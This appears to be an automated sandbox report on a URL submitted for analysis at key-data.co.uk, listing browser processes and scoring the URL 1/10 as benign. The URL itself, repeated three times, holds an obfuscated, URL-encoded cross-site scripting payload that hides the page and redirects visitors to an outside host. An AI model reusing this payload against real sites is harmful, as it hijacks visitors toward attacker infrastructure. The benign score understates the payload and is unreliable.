Malware Analysis Report

2025-01-18 02:06

Sample ID 240613-jeha5azaqf
Target https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E
Tags

N/A

Score

1/10


Analysis Overview

Threat Level: No (potentially) malicious behavior was detected

The submitted URL (listed under Target above) was found to be: No (potentially) malicious behavior was detected.

Malicious Activity Summary

N/A

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-13 07:34

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 07:34

Reported

2024-06-13 07:37

Platform

win10v2004-20240611-en

Max time kernel

128s

Max time network

140s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E

Signatures

N/A

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4376,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=3896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=3824,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4936 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5328,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5336,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5420 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=1308,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=5544,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:8

Network

Files

N/A